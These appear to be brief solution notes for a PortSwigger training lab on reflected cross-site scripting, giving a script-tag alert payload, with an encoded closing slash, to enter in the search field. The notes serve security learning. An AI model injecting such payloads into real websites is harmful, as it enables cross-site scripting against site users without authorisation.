Port_Swigger_Reflected XSS into HTML context with nothing encoded

Reflected XSS into HTML context with nothing encoded

Solution

Put xss payload in search

Payload: <script>alert("hacked")<%2Fscript>